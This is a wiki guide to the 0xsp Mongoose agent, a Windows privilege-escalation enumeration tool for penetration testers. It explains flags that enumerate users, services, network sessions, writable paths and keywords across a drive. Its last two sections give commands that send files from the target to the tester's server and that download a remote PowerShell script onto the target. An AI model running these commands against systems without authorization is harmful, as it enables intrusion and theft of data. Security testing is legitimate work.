Mongoose Windows Agent Guide

Lawrence Amer edited this page Aug 19, 2019 · 16 revisions

The Mongoose Windows privilege escalation enumeration toolkit offers many enumeration features that are helpful for pentesting tasks. 0xsp Mongoose is built with Lazarus (Free Pascal), and the source code has been released with instructions for compiling it successfully.
With 0xsp Mongoose you can run two types of scan: a Solo scan, which does not export results to the web application API, or an Advanced scan, which transfers the results to the web application interface.

To run an Advanced scan, add -o SITEORIP -x SECRETKEY to any scan you perform. Mongoose then exports all output to the 0xsp web application.

Banner information

On first execution, Mongoose quickly reports whether the target is vulnerable to a common Windows kernel exploit, rotten potato, along with system information and the status of PowerShell.

User information

Run Mongoose with -u to start retrieving user information for security purposes immediately. This option covers roles, current permissions, enabled and disabled token privileges, and net local users.

Services Enumeration

Run the agent with the -s parameter to list active services and drivers. In all of its calls, Mongoose depends on the Windows kernel API to retrieve this information.

Network Enumeration

Run the agent with the -n parameter to get all information related to network operations, active connections and active sessions.

Potential Files

An advanced file search and indexing engine is built into the Mongoose agent. While scanning the whole server, Mongoose can search for several file extensions at the same time when you pass the -c parameter.

System information Enumeration

The Mongoose agent enumerates basic, helpful system information and active login sessions when you type -i.

Access Check Enumeration techniques

Mongoose uses two methods to check current permissions: one uses icacls, and the other uses a built-in function that scans the whole system for possible write access.

Find Specific Keyword on Whole Machine

The Mongoose agent can scan files with a specific extension across a whole drive for a keyword you supply. To use this function, type -l {DRIVER} {STRING} {EXTENSION}

Transfer File From Machine

The Mongoose agent can transfer any file to the 0xsp web application Download center, so the tester can easily get a file into the 0xsp web application to download later or store in the database.

agent.exe -t API SecretKey

Download files into Machine

The Mongoose agent can download any file from the web or a direct link onto the target machine by typing:

agent.exe -d http://link/script.ps1 script.ps1